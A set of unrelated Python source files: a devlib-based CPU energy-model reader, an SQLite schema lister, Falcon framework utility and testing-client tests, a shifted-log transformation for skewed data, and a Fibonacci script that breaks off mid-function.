# We only care about core_siblings, but let's check *_siblings, so we
# can throw an error if a CPU's thread_siblings isn't just itself, or if
# there's a topology level we don't understand.
# Since we might have to read a lot of files, read everything we need in
# one go to avoid taking too long.
mask_glob = topology_base + 'cpu**/topology/*_siblings'
file_values = read_multiple_oneline_files(target, [mask_glob])
regex = re.compile(
topology_base + r'cpu([0-9]+)/topology/([a-z]+)_siblings')
ret = set()
for path, mask_str in file_values.iteritems():
match = regex.match(path)
cpu = int(match.groups()[0])
level = match.groups()[1]
# mask_to_list returns the values in descending order, so we'll sort
# them ascending. This isn't strictly necessary but it's nicer.
siblings = tuple(sorted(mask_to_list(int(mask_str, 16))))
if level == 'thread':
if siblings != (cpu,):
# SMT systems aren't supported
raise RuntimeError('CPU{} thread_siblings is {}. '
'expected {}'.format(cpu, siblings, [cpu]))
continue
if level != 'core':
# The only other levels we should expect to find are 'book' and
# 'shelf', which are not used by architectures we support.
raise RuntimeError(
'Unrecognised topology level "{}"'.format(level))
ret.add(siblings)
# Sort core groups so that the lowest-numbered cores are first
# Again, not strictly necessary, just more pleasant.
return sorted(ret, key=lambda x: x[0])
@classmethod
def from_target(cls, target):
"""
Create an EnergyModel by reading a target filesystem
        This uses the sysctl added by EAS patches to expose the cap_states and
idle_states fields for each sched_group. This feature depends on
CONFIG_SCHED_DEBUG, and is not upstream in mainline Linux (as of v4.11),
so this method is only tested with Android kernels.
        The kernel doesn't have any power domain data, so this method assumes
that all CPUs are totally independent wrt. idle states - the EnergyModel
constructed won't be aware of the topological dependencies for entering
"cluster" idle states.
Assumes the energy model has two-levels (plus the root) - a level for
CPUs and a level for 'clusters'.
:param target: Devlib target object to read filesystem from. Must have
cpufreq and cpuidle modules enabled.
:returns: Constructed EnergyModel object based on the parameters
reported by the target.
"""
if 'cpufreq' not in target.modules:
raise TargetError('Requires cpufreq devlib module. Please ensure '
'"cpufreq" is listed in your target/test modules')
if 'cpuidle' not in target.modules:
raise TargetError('Requires cpuidle devlib module. Please ensure '
'"cpuidle" is listed in your target/test modules')
def sge_path(cpu, domain, group, field):
f = '/proc/sys/kernel/sched_domain/cpu{}/domain{}/group{}/energy/{}'
return f.format(cpu, domain, group, field)
# Read all the files we might need in one go, otherwise this will take
# ages.
sge_globs = [sge_path('**', '**', '**', 'cap_states'),
sge_path('**', '**', '**', 'idle_states')]
sge_file_values = read_multiple_oneline_files(target, sge_globs)
if not sge_file_values:
raise TargetError('Energy Model not exposed in sysfs. '
'Check CONFIG_SCHED_DEBUG is enabled.')
# These functions read the cap_states and idle_states vectors for the
# first sched_group in the sched_domain for a given CPU at a given
# level. That first group will include the given CPU. So
# read_active_states(0, 0) will give the CPU-level active_states for
# CPU0 and read_active_states(0, 1) will give the "cluster"-level
# active_states for the "cluster" that contains CPU0.
def read_sge_file(path):
try:
return sge_file_values[path]
except KeyError as e:
raise TargetError('No such file: {}'.format(e))
def read_active_states(cpu, domain_level):
cap_states_path = sge_path(cpu, domain_level, 0, 'cap_states')
cap_states_strs = read_sge_file(cap_states_path).split()
# cap_states lists the capacity of each state followed by its power,
# in increasing order. The `zip` call does this:
# [c0, p0, c1, p1, c2, p2] -> [(c0, p0), (c1, p1), (c2, p2)]
cap_states = [ActiveState(capacity=int(c), power=int(p))
for c, p in zip(cap_states_strs[0::2],
cap_states_strs[1::2])]
freqs = target.cpufreq.list_frequencies(cpu)
return OrderedDict(zip(sorted(freqs), cap_states))
def read_idle_states(cpu, domain_level):
idle_states_path = sge_path(cpu, domain_level, 0, 'idle_states')
idle_states_strs = read_sge_file(idle_states_path).split()
# get_states should return the state names in increasing depth order
names = [s.name for s in target.cpuidle.get_states(cpu)]
# idle_states is a list of power values in increasing order of
# idle-depth/decreasing order of power.
return OrderedDict(zip(names, [int(p) for p in idle_states_strs]))
# Read the CPU-level data from sched_domain level 0
cpus = range(target.number_of_cpus)
cpu_nodes = []
for cpu in cpus:
node = EnergyModelNode(
cpu=cpu,
active_states=read_active_states(cpu, 0),
idle_states=read_idle_states(cpu, 0))
cpu_nodes.append(node)
# Read the "cluster" level data from sched_domain level 1
core_group_nodes = []
for core_group in cls._find_core_groups(target):
            node = EnergyModelNode(
children=[cpu_nodes[c] for c in core_group],
active_states=read_active_states(core_group[0], 1),
idle_states=read_idle_states(core_group[0], 1))
core_group_nodes.append(node)
root = EnergyModelRoot(children=core_group_nodes)
# Use cpufreq to figure out the frequency domains
freq_domains = []
remaining_cpus = set(cpus)
while remaining_cpus:
cpu = next(iter(remaining_cpus))
dom = target.cpufreq.get_related_cpus(cpu)
freq_domains.append(dom)
remaining_cpus = remaining_cpus.difference(dom)
# We don't have a way to read the power domains from sysfs (the kernel
# isn't even aware of them) so we'll just have to assume each CPU is its
# own power domain and all idle states are independent of each other.
cpu_pds = []
for cpu in cpus:
names = [s.name for s in target.cpuidle.get_states(cpu)]
cpu_pds.append(PowerDomain(cpu=cpu, idle_states=names))
        root_pd = PowerDomain(children=cpu_pds, idle_states=[])
return cls(root_node=root,
root_power_domain=root_pd,
freq_domains=freq_domains)
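# Hedged usage sketch (illustration only, not part of the original module): build
# a tiny two-CPU, single-cluster model and estimate its power for one utilization
# distribution. All capacity/power numbers are made up, and the snippet follows
# the Python 2 idioms used by the rest of this file.
if __name__ == '__main__':
    def _demo_cpu(cpu):
        return EnergyModelNode(
            cpu=cpu,
            active_states=OrderedDict([
                (500000, ActiveState(capacity=512, power=100)),
                (1000000, ActiveState(capacity=1024, power=300))]),
            idle_states=OrderedDict([('WFI', 5), ('cpu-sleep', 0)]))
    _cpus = [_demo_cpu(0), _demo_cpu(1)]
    _cluster = EnergyModelNode(
        children=_cpus,
        active_states=OrderedDict([
            (500000, ActiveState(power=10)),
            (1000000, ActiveState(power=30))]),
        idle_states=OrderedDict([
            ('WFI', 8), ('cpu-sleep', 8), ('cluster-sleep', 0)]))
    _root_pd = PowerDomain(idle_states=['cluster-sleep'], children=[
        PowerDomain(cpu=c, idle_states=['WFI', 'cpu-sleep']) for c in (0, 1)])
    _em = EnergyModel(root_node=EnergyModelRoot(children=[_cluster]),
                      root_power_domain=_root_pd,
                      freq_domains=[[0, 1]])
    # Power contribution (in bogo-Watts) of each component, keyed by CPU tuple
    print(_em.estimate_from_cpu_util([256, 0]))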
|
the-stack_106_22073
|
FILENAME = "path/to/lahman2016.sqlite"
# import `pandas` and `sqlite3`
import pandas as pd
import sqlite3
# Connecting to SQLite Database
conn = sqlite3.connect(FILENAME)
# Query to list all tables in the database.
query = "select name from sqlite_master where type = 'table';"
# Fetching the list of table names returned by the query.
tables = conn.execute(query).fetchall()
# schema
query = "select sql from sqlite_master where type = 'table' and name = ?;"
# num of record
# query = "select count(*) from ?;"
for t in tables:
r = conn.execute(query, t).fetchone()
print("TABLE: ", t[0])
print("SCHEMA: ", r[0])
print()
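# Hedged sketch (illustration only): SQLite cannot bind table names with "?"
# placeholders (the commented-out count query above would not work that way), so
# a per-table row count has to format the trusted table name into the SQL string.
for t in tables:
    count = conn.execute('select count(*) from "{}";'.format(t[0])).fetchone()[0]
    print("TABLE: ", t[0], "ROWS: ", count)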
|
the-stack_106_22075
|
# -*- coding: utf-8 -*-
from datetime import datetime
import functools
import random
import pytest
import falcon
from falcon import testing
from falcon import util
from falcon.util import compat, json, uri
def _arbitrary_uris(count, length):
return (
u''.join(
[random.choice(uri._ALL_ALLOWED)
for _ in range(length)]
) for __ in range(count)
)
class TestFalconUtils(object):
def setup_method(self, method):
# NOTE(cabrera): for DRYness - used in uri.[de|en]code tests
# below.
self.uris = _arbitrary_uris(count=100, length=32)
def test_deprecated_decorator(self):
msg = 'Please stop using this thing. It is going away.'
@util.deprecated(msg)
def old_thing():
pass
with pytest.warns(UserWarning) as rec:
old_thing()
warn = rec.pop()
assert msg in str(warn.message)
def test_http_now(self):
expected = datetime.utcnow()
actual = falcon.http_date_to_dt(falcon.http_now())
delta = actual - expected
delta_sec = abs(delta.days * 86400 + delta.seconds)
assert delta_sec <= 1
def test_dt_to_http(self):
assert falcon.dt_to_http(datetime(2013, 4, 4)) == 'Thu, 04 Apr 2013 00:00:00 GMT'
assert falcon.dt_to_http(
datetime(2013, 4, 4, 10, 28, 54)
) == 'Thu, 04 Apr 2013 10:28:54 GMT'
def test_http_date_to_dt(self):
assert falcon.http_date_to_dt('Thu, 04 Apr 2013 00:00:00 GMT') == datetime(2013, 4, 4)
assert falcon.http_date_to_dt(
'Thu, 04 Apr 2013 10:28:54 GMT'
) == datetime(2013, 4, 4, 10, 28, 54)
with pytest.raises(ValueError):
falcon.http_date_to_dt('Thu, 04-Apr-2013 10:28:54 GMT')
assert falcon.http_date_to_dt(
'Thu, 04-Apr-2013 10:28:54 GMT', obs_date=True
) == datetime(2013, 4, 4, 10, 28, 54)
with pytest.raises(ValueError):
falcon.http_date_to_dt('Sun Nov 6 08:49:37 1994')
with pytest.raises(ValueError):
falcon.http_date_to_dt('Nov 6 08:49:37 1994', obs_date=True)
assert falcon.http_date_to_dt(
'Sun Nov 6 08:49:37 1994', obs_date=True
) == datetime(1994, 11, 6, 8, 49, 37)
assert falcon.http_date_to_dt(
'Sunday, 06-Nov-94 08:49:37 GMT', obs_date=True
) == datetime(1994, 11, 6, 8, 49, 37)
def test_pack_query_params_none(self):
assert falcon.to_query_str({}) == ''
def test_pack_query_params_one(self):
assert falcon.to_query_str({'limit': 10}) == '?limit=10'
assert falcon.to_query_str(
{'things': [1, 2, 3]}) == '?things=1,2,3'
assert falcon.to_query_str({'things': ['a']}) == '?things=a'
assert falcon.to_query_str(
{'things': ['a', 'b']}) == '?things=a,b'
expected = ('?things=a&things=b&things=&things=None'
'&things=true&things=false&things=0')
actual = falcon.to_query_str(
{'things': ['a', 'b', '', None, True, False, 0]},
comma_delimited_lists=False
)
assert actual == expected
def test_pack_query_params_several(self):
garbage_in = {
'limit': 17,
'echo': True,
'doit': False,
'x': 'val',
'y': 0.2
}
query_str = falcon.to_query_str(garbage_in)
fields = query_str[1:].split('&')
garbage_out = {}
for field in fields:
k, v = field.split('=')
garbage_out[k] = v
expected = {
'echo': 'true',
'limit': '17',
'x': 'val',
'y': '0.2',
'doit': 'false'}
assert expected == garbage_out
def test_uri_encode(self):
url = 'http://example.com/v1/fizbit/messages?limit=3&echo=true'
assert uri.encode(url) == url
url = 'http://example.com/v1/fiz bit/messages'
expected = 'http://example.com/v1/fiz%20bit/messages'
assert uri.encode(url) == expected
url = u'http://example.com/v1/fizbit/messages?limit=3&e\u00e7ho=true'
expected = ('http://example.com/v1/fizbit/messages'
'?limit=3&e%C3%A7ho=true')
assert uri.encode(url) == expected
def test_uri_encode_double(self):
url = 'http://example.com/v1/fiz bit/messages'
expected = 'http://example.com/v1/fiz%20bit/messages'
assert uri.encode(uri.encode(url)) == expected
url = u'http://example.com/v1/fizbit/messages?limit=3&e\u00e7ho=true'
expected = ('http://example.com/v1/fizbit/messages'
'?limit=3&e%C3%A7ho=true')
assert uri.encode(uri.encode(url)) == expected
url = 'http://example.com/v1/fiz%bit/mess%ages/%'
expected = 'http://example.com/v1/fiz%25bit/mess%25ages/%25'
assert uri.encode(uri.encode(url)) == expected
url = 'http://example.com/%%'
expected = 'http://example.com/%25%25'
assert uri.encode(uri.encode(url)) == expected
# NOTE(kgriffs): Specific example cited in GH issue
url = 'http://something?redirect_uri=http%3A%2F%2Fsite'
assert uri.encode(url) == url
hex_digits = 'abcdefABCDEF0123456789'
for c1 in hex_digits:
for c2 in hex_digits:
url = 'http://example.com/%' + c1 + c2
encoded = uri.encode(uri.encode(url))
assert encoded == url
def test_uri_encode_value(self):
assert uri.encode_value('abcd') == 'abcd'
assert uri.encode_value(u'abcd') == u'abcd'
assert uri.encode_value(u'ab cd') == u'ab%20cd'
assert uri.encode_value(u'\u00e7') == '%C3%A7'
assert uri.encode_value(u'\u00e7\u20ac') == '%C3%A7%E2%82%AC'
assert uri.encode_value('ab/cd') == 'ab%2Fcd'
assert uri.encode_value('ab+cd=42,9') == 'ab%2Bcd%3D42%2C9'
def test_uri_decode(self):
assert uri.decode('abcd') == 'abcd'
assert uri.decode(u'abcd') == u'abcd'
assert uri.decode(u'ab%20cd') == u'ab cd'
assert uri.decode('This thing is %C3%A7') == u'This thing is \u00e7'
assert uri.decode('This thing is %C3%A7%E2%82%AC') == u'This thing is \u00e7\u20ac'
assert uri.decode('ab%2Fcd') == 'ab/cd'
assert uri.decode(
'http://example.com?x=ab%2Bcd%3D42%2C9'
) == 'http://example.com?x=ab+cd=42,9'
def test_prop_uri_encode_models_stdlib_quote(self):
equiv_quote = functools.partial(
compat.quote, safe=uri._ALL_ALLOWED
)
for case in self.uris:
expect = equiv_quote(case)
actual = uri.encode(case)
assert expect == actual
def test_prop_uri_encode_value_models_stdlib_quote_safe_tilde(self):
equiv_quote = functools.partial(
compat.quote, safe='~'
)
for case in self.uris:
expect = equiv_quote(case)
actual = uri.encode_value(case)
assert expect == actual
def test_prop_uri_decode_models_stdlib_unquote_plus(self):
stdlib_unquote = compat.unquote_plus
for case in self.uris:
case = uri.encode_value(case)
expect = stdlib_unquote(case)
actual = uri.decode(case)
assert expect == actual
def test_unquote_string(self):
assert uri.unquote_string('v') == 'v'
assert uri.unquote_string('not-quoted') == 'not-quoted'
assert uri.unquote_string('partial-quoted"') == 'partial-quoted"'
assert uri.unquote_string('"partial-quoted') == '"partial-quoted'
assert uri.unquote_string('"partial-quoted"') == 'partial-quoted'
def test_parse_query_string(self):
        query_string = (
'a=http%3A%2F%2Ffalconframework.org%3Ftest%3D1'
'&b=%7B%22test1%22%3A%20%22data1%22%'
'2C%20%22test2%22%3A%20%22data2%22%7D'
'&c=1,2,3'
'&d=test'
'&e=a,,%26%3D%2C'
'&f=a&f=a%3Db'
'&%C3%A9=a%3Db'
)
decoded_url = 'http://falconframework.org?test=1'
decoded_json = '{"test1": "data1", "test2": "data2"}'
        result = uri.parse_query_string(query_string)
assert result['a'] == decoded_url
assert result['b'] == decoded_json
assert result['c'] == ['1', '2', '3']
assert result['d'] == 'test'
assert result['e'] == ['a', '&=,']
assert result['f'] == ['a', 'a=b']
assert result[u'é'] == 'a=b'
        result = uri.parse_query_string(query_string, True)
assert result['a'] == decoded_url
assert result['b'] == decoded_json
assert result['c'] == ['1', '2', '3']
assert result['d'] == 'test'
assert result['e'] == ['a', '', '&=,']
assert result['f'] == ['a', 'a=b']
assert result[u'é'] == 'a=b'
def test_parse_host(self):
assert uri.parse_host('::1') == ('::1', None)
assert uri.parse_host('2001:ODB8:AC10:FE01::') == ('2001:ODB8:AC10:FE01::', None)
assert uri.parse_host(
'2001:ODB8:AC10:FE01::', default_port=80
) == ('2001:ODB8:AC10:FE01::', 80)
ipv6_addr = '2001:4801:1221:101:1c10::f5:116'
assert uri.parse_host(ipv6_addr) == (ipv6_addr, None)
assert uri.parse_host('[' + ipv6_addr + ']') == (ipv6_addr, None)
assert uri.parse_host('[' + ipv6_addr + ']:28080') == (ipv6_addr, 28080)
assert uri.parse_host('[' + ipv6_addr + ']:8080') == (ipv6_addr, 8080)
assert uri.parse_host('[' + ipv6_addr + ']:123') == (ipv6_addr, 123)
assert uri.parse_host('[' + ipv6_addr + ']:42') == (ipv6_addr, 42)
assert uri.parse_host('173.203.44.122') == ('173.203.44.122', None)
assert uri.parse_host('173.203.44.122', default_port=80) == ('173.203.44.122', 80)
assert uri.parse_host('173.203.44.122:27070') == ('173.203.44.122', 27070)
assert uri.parse_host('173.203.44.122:123') == ('173.203.44.122', 123)
assert uri.parse_host('173.203.44.122:42') == ('173.203.44.122', 42)
assert uri.parse_host('example.com') == ('example.com', None)
assert uri.parse_host('example.com', default_port=443) == ('example.com', 443)
assert uri.parse_host('falcon.example.com') == ('falcon.example.com', None)
assert uri.parse_host('falcon.example.com:9876') == ('falcon.example.com', 9876)
assert uri.parse_host('falcon.example.com:42') == ('falcon.example.com', 42)
def test_get_http_status(self):
assert falcon.get_http_status(404) == falcon.HTTP_404
assert falcon.get_http_status(404.3) == falcon.HTTP_404
assert falcon.get_http_status('404.3') == falcon.HTTP_404
assert falcon.get_http_status(404.9) == falcon.HTTP_404
assert falcon.get_http_status('404') == falcon.HTTP_404
assert falcon.get_http_status(123) == '123 Unknown'
with pytest.raises(ValueError):
falcon.get_http_status('not_a_number')
with pytest.raises(ValueError):
falcon.get_http_status(0)
with pytest.raises(ValueError):
falcon.get_http_status(0)
with pytest.raises(ValueError):
falcon.get_http_status(99)
with pytest.raises(ValueError):
falcon.get_http_status(-404.3)
with pytest.raises(ValueError):
falcon.get_http_status('-404')
with pytest.raises(ValueError):
falcon.get_http_status('-404.3')
assert falcon.get_http_status(123, 'Go Away') == '123 Go Away'
@pytest.mark.parametrize(
'protocol,method',
zip(
['https'] * len(falcon.HTTP_METHODS) + ['http'] * len(falcon.HTTP_METHODS),
falcon.HTTP_METHODS * 2
)
)
def test_simulate_request_protocol(protocol, method):
sink_called = [False]
def sink(req, resp):
sink_called[0] = True
assert req.protocol == protocol
app = falcon.API()
app.add_sink(sink, '/test')
client = testing.TestClient(app)
try:
        simulate = getattr(client, 'simulate_' + method.lower())
simulate('/test', protocol=protocol)
assert sink_called[0]
except AttributeError:
# NOTE(kgriffs): simulate_* helpers do not exist for all methods
pass
@pytest.mark.parametrize('simulate', [
testing.simulate_get,
testing.simulate_head,
testing.simulate_post,
testing.simulate_put,
testing.simulate_options,
testing.simulate_patch,
testing.simulate_delete,
])
def test_simulate_free_functions(simulate):
sink_called = [False]
def sink(req, resp):
sink_called[0] = True
app = falcon.API()
app.add_sink(sink, '/test')
simulate(app, '/test')
assert sink_called[0]
class TestFalconTestingUtils(object):
"""Verify some branches not covered elsewhere."""
def test_path_escape_chars_in_create_environ(self):
env = testing.create_environ('/hello%20world%21')
assert env['PATH_INFO'] == '/hello world!'
def test_no_prefix_allowed_for_query_strings_in_create_environ(self):
with pytest.raises(ValueError):
testing.create_environ(query_string='?foo=bar')
@pytest.mark.skipif(compat.PY3, reason='Test does not apply to Py3K')
def test_unicode_path_in_create_environ(self):
env = testing.create_environ(u'/fancy/unícode')
assert env['PATH_INFO'] == '/fancy/un\xc3\xadcode'
env = testing.create_environ(u'/simple')
assert env['PATH_INFO'] == '/simple'
def test_none_header_value_in_create_environ(self):
env = testing.create_environ('/', headers={'X-Foo': None})
assert env['HTTP_X_FOO'] == ''
def test_decode_empty_result(self):
app = falcon.API()
client = testing.TestClient(app)
response = client.simulate_request(path='/')
assert response.text == ''
def test_httpnow_alias_for_backwards_compat(self):
assert testing.httpnow is util.http_now
def test_default_headers(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
headers = {
'Authorization': 'Bearer 123',
}
client = testing.TestClient(app, headers=headers)
client.simulate_get()
assert resource.captured_req.auth == headers['Authorization']
client.simulate_get(headers=None)
assert resource.captured_req.auth == headers['Authorization']
def test_default_headers_with_override(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
override_before = 'something-something'
override_after = 'something-something'[::-1]
headers = {
'Authorization': 'Bearer XYZ',
'Accept': 'application/vnd.siren+json',
'X-Override-Me': override_before,
}
client = testing.TestClient(app, headers=headers)
client.simulate_get(headers={'X-Override-Me': override_after})
assert resource.captured_req.auth == headers['Authorization']
assert resource.captured_req.accept == headers['Accept']
assert resource.captured_req.get_header('X-Override-Me') == override_after
def test_status(self):
app = falcon.API()
resource = testing.SimpleTestResource(status=falcon.HTTP_702)
app.add_route('/', resource)
client = testing.TestClient(app)
result = client.simulate_get()
assert result.status == falcon.HTTP_702
def test_wsgi_iterable_not_closeable(self):
result = testing.Result([], falcon.HTTP_200, [])
assert not result.content
assert result.json is None
def test_path_must_start_with_slash(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get('foo')
def test_cached_text_in_result(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource(body='test'))
client = testing.TestClient(app)
result = client.simulate_get()
assert result.text == result.text
def test_simple_resource_body_json_xor(self):
with pytest.raises(ValueError):
testing.SimpleTestResource(body='', json={})
def test_query_string(self):
class SomeResource(object):
def on_get(self, req, resp):
doc = {}
doc['oid'] = req.get_param_as_int('oid')
doc['detailed'] = req.get_param_as_bool('detailed')
doc['things'] = req.get_param_as_list('things', int)
doc['query_string'] = req.query_string
resp.body = json.dumps(doc)
app = falcon.API()
app.req_options.auto_parse_qs_csv = True
app.add_route('/', SomeResource())
client = testing.TestClient(app)
result = client.simulate_get(query_string='oid=42&detailed=no&things=1')
assert result.json['oid'] == 42
assert not result.json['detailed']
assert result.json['things'] == [1]
params = {'oid': 42, 'detailed': False}
result = client.simulate_get(params=params)
assert result.json['oid'] == params['oid']
assert not result.json['detailed']
assert result.json['things'] is None
params = {'oid': 1978, 'detailed': 'yes', 'things': [1, 2, 3]}
result = client.simulate_get(params=params)
assert result.json['oid'] == params['oid']
assert result.json['detailed']
assert result.json['things'] == params['things']
expected_qs = 'things=1,2,3'
result = client.simulate_get(params={'things': [1, 2, 3]})
assert result.json['query_string'] == expected_qs
expected_qs = 'things=1&things=2&things=3'
result = client.simulate_get(params={'things': [1, 2, 3]},
params_csv=False)
assert result.json['query_string'] == expected_qs
def test_query_string_no_question(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get(query_string='?x=1')
def test_query_string_in_path(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource())
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get(path='/thing?x=1')
@pytest.mark.parametrize('document', [
# NOTE(vytas): using an exact binary fraction here to avoid special
# code branch for approximate equality as it is not the focus here
16.0625,
123456789,
True,
'',
u'I am a \u1d0a\ua731\u1d0f\u0274 string.',
[1, 3, 3, 7],
{u'message': u'\xa1Hello Unicode! \U0001F638'},
{
'count': 4,
'items': [
{'number': 'one'},
{'number': 'two'},
{'number': 'three'},
{'number': 'four'},
],
'next': None,
},
])
def test_simulate_json_body(self, document):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
json_types = ('application/json', 'application/json; charset=UTF-8')
client = testing.TestClient(app)
client.simulate_post('/', json=document)
captured_body = resource.captured_req.stream.read().decode('utf-8')
assert json.loads(captured_body) == document
assert resource.captured_req.content_type in json_types
headers = {
'Content-Type': 'x-falcon/peregrine',
'X-Falcon-Type': 'peregrine',
}
body = 'If provided, `json` parameter overrides `body`.'
client.simulate_post('/', headers=headers, body=body, json=document)
assert resource.captured_req.media == document
assert resource.captured_req.content_type in json_types
assert resource.captured_req.get_header('X-Falcon-Type') == 'peregrine'
@pytest.mark.parametrize('remote_addr', [
None,
'127.0.0.1',
'8.8.8.8',
'104.24.101.85',
'2606:4700:30::6818:6455',
])
def test_simulate_remote_addr(self, remote_addr):
class ShowMyIPResource(object):
def on_get(self, req, resp):
resp.body = req.remote_addr
resp.content_type = falcon.MEDIA_TEXT
app = falcon.API()
app.add_route('/', ShowMyIPResource())
client = testing.TestClient(app)
resp = client.simulate_get('/', remote_addr=remote_addr)
assert resp.status_code == 200
if remote_addr is None:
assert resp.text == '127.0.0.1'
else:
assert resp.text == remote_addr
def test_simulate_hostname(self):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
client = testing.TestClient(app)
client.simulate_get('/', protocol='https',
host='falcon.readthedocs.io')
assert resource.captured_req.uri == 'https://falcon.readthedocs.io/'
@pytest.mark.parametrize('extras,expected_headers', [
(
{},
(('user-agent', 'curl/7.24.0 (x86_64-apple-darwin12.0)'),),
),
(
{'HTTP_USER_AGENT': 'URL/Emacs', 'HTTP_X_FALCON': 'peregrine'},
(('user-agent', 'URL/Emacs'), ('x-falcon', 'peregrine')),
),
])
def test_simulate_with_environ_extras(self, extras, expected_headers):
app = falcon.API()
resource = testing.SimpleTestResource()
app.add_route('/', resource)
client = testing.TestClient(app)
client.simulate_get('/', extras=extras)
for header, value in expected_headers:
assert resource.captured_req.get_header(header) == value
def test_override_method_with_extras(self):
app = falcon.API()
app.add_route('/', testing.SimpleTestResource(body='test'))
client = testing.TestClient(app)
with pytest.raises(ValueError):
client.simulate_get('/', extras={'REQUEST_METHOD': 'PATCH'})
resp = client.simulate_get('/', extras={'REQUEST_METHOD': 'GET'})
assert resp.status_code == 200
assert resp.text == 'test'
class TestNoApiClass(testing.TestCase):
def test_something(self):
self.assertTrue(isinstance(self.app, falcon.API))
class TestSetupApi(testing.TestCase):
def setUp(self):
super(TestSetupApi, self).setUp()
self.api = falcon.API()
def test_something(self):
self.assertTrue(isinstance(self.api, falcon.API))
|
the-stack_106_22076
|
import scipy.stats
import numpy as np
from numpy import sign, abs, exp, log, pi, sqrt
from numpy import nanmean as mean, nanstd as std, nanmedian as median, nanmin as min, nanmax as max
# .95 quantile of Extreme Value Distribution
_gumble_p95 = scipy.stats.gumbel_l.ppf(.95)
def _skew(vector):
return scipy.stats.skew(vector, nan_policy='omit')
def _andersondarling(vector):
"Compute Anderson Darling statistic of given vector"
vector = vector[~np.isnan(vector)] # remove nans
n = len(vector)
if n < 7:
raise ValueError('Anderson Darling statistic requires at least 7 non-NAs')
vector = np.sort(vector)
f = scipy.stats.norm.cdf(vector, mean(vector), std(vector, ddof=1))
i = np.arange(1, n+1)
S = sum((2*i - 1)/n * (log(f) + log(1-np.flip(f))))
return -n-S
def _winsorize(vector):
"Winsorize based on 95th percentile of extreme value distribution"
n = np.count_nonzero(~np.isnan(vector))
gumble_p95 = _gumble_p95 # cache this call for speed
a_n = (2*log(n))**(-0.5)
b_n = (2*log(n) - log(log(n)) - log(4*pi))**0.5
threshold = gumble_p95 * a_n + b_n
# TODO: Warnings are issued here when vector contains nans.
vector[vector > threshold] = threshold
vector[vector < -threshold] = -threshold
return vector
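# Note (added, hedged): a_n and b_n above are (a version of) the classical
# extreme-value normalizing constants for the maximum of n i.i.d. standard
# normal values -- (max - b_n) / a_n converges to a Gumbel distribution as n
# grows -- so the threshold is meant to be a cutoff that such a sample's
# extremes would only rarely exceed.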
def _get_data_range(vector):
IQR = scipy.stats.iqr(vector, nan_policy='omit')
# TODO: Scipy computes IQR slightly differently
# from MATLAB. This leads to slightly different
# results from Marron's version
if IQR == 0:
data_range = max(vector) - min(vector)
else:
data_range = IQR
return data_range
def _shiftedlog(vector, shift, _data_range=None):
"Apply shifted log transformation with the given shift"
beta = sign(shift) * (exp(abs(shift))-1)
if _data_range is not None:
data_range = _data_range
else:
data_range = _get_data_range(vector)
# Transform data based on sign of beta
if beta == 0:
vector = vector
elif beta > 0:
alpha = abs(1.0/beta)
vector = log(vector - min(vector) + alpha*data_range)
else:
alpha = abs(1.0/beta)
vector = -log(max(vector) - vector + alpha*data_range)
vector_median = median(vector)
MAD = mean(abs(vector - vector_median)) * sqrt(pi / 2)
if MAD == 0:
# if the MAD is 0, just return zeroes but retain nans.
vector[~np.isnan(vector)] = 0
return vector
vector = (vector - vector_median) / MAD
vector = _winsorize(vector)
vector = (vector - mean(vector)) / std(vector, ddof=1)
return vector
def autoshiftedlog(vector, score_function='Anderson Darling', verbose=False):
"""Apply shifted log transformation, automatically selecting the best shift
based on desired score function.
vector: a numpy array or pandas Series
score_function: 'Anderson Darling' or 'skewness'
verbose: if True, prints the optimal value of beta
"""
if score_function == 'Anderson Darling':
score = _andersondarling
elif score_function == 'skewness':
score = _skew
else:
raise ValueError("metric must be 'Anderson Darling' or 'skewness'")
if std(vector) == 0:
# if the SD is 0, just return zeroes but retain nans.
vector[~np.isnan(vector)] = 0
return vector
data_range = _get_data_range(vector) # computing this in advance speeds up the search
# Set up an array of possible shift values to try
if _skew(vector) > 0:
shifts = np.arange(0.0, 9.0, step=0.01)
else:
shifts = -np.arange(0.0, 9.0, step=0.01)
# Find the shift that minimizes the desired score function
scores = [score(_shiftedlog(vector, s, data_range)) for s in shifts]
minimizing_index = np.argmin(scores)
best_shift = shifts[minimizing_index]
best_transformation = _shiftedlog(vector, best_shift, data_range)
if verbose:
best_beta = sign(best_shift) * (exp(abs(best_shift))-1)
print("Transformation parameter beta: {}".format(best_beta))
return best_transformation
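# Illustrative usage sketch (added; not part of the original module). The data
# below is synthetic and the variable names are hypothetical.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    skewed = exp(rng.normal(size=500))  # log-normal sample, strongly right-skewed
    transformed = autoshiftedlog(skewed, score_function='Anderson Darling', verbose=True)
    print('skewness before: {:.2f}, after: {:.2f}'.format(_skew(skewed), _skew(transformed)))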
|
the-stack_106_22077
|
# Fibonacci tool
# This script only works with Python3!
import time
def getFibonacciIterative(n: int) -> int:
"""
Calculate the fibonacci number at position n iteratively
"""
a = 0
b = 1
for i in range(n):
a, b = b, a + b
return a
def getFibonacciRecursive(n: int) -> int:
"""
Calculate the fibonacci number at position n recursively
"""
a = 0
b = 1
def step(n: int) -> int:
nonlocal a, b
if n <= 0:
return a
a, b = b, a + b
return step(n - 1)
return step(n)
def getFibonacciDynamic(n: int, fib: list) -> int:
    '''
    Calculate the fibonacci number at position n using dynamic programming to improve runtime
    '''
    if n == 0 or n == 1:
        return n
    if fib[n] != -1:
        return fib[n]
    fib[n] = getFibonacciDynamic(n - 1, fib) + getFibonacciDynamic(n - 2, fib)
    return fib[n]
def main():
    n = int(input())
    fib = [-1] * (n + 1)  # n + 1 slots so that fib[n] is a valid index
    print(getFibonacciDynamic(n, fib))
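# Illustrative sketch (added; not part of the original tool): a quick agreement
# check between the three implementations for a small n.
def _checkFibonacciImplementations(n: int = 10) -> None:
    memo = [-1] * (n + 1)
    assert getFibonacciIterative(n) == getFibonacciRecursive(n) == getFibonacciDynamic(n, memo)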
def compareFibonacciCalculators(n: int) -> None:
"""
Interactively compare both fibonacci generators
"""
